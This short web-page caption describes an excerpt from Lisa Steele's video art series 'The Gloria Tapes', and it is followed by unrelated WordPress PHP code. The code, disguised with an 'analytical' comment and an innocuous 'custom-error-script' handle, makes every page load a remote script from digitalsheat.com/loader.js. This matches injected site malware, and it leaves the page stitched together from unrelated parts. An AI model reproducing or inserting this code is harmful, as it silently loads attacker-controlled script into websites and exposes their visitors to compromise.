An excerpt from the video art piece “The Gloria Tapes” by Canadian video artist Lisa Steele.
The video, which parodies soap operas, is a 4-part series about a single mother on welfare.
// analytical function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script');

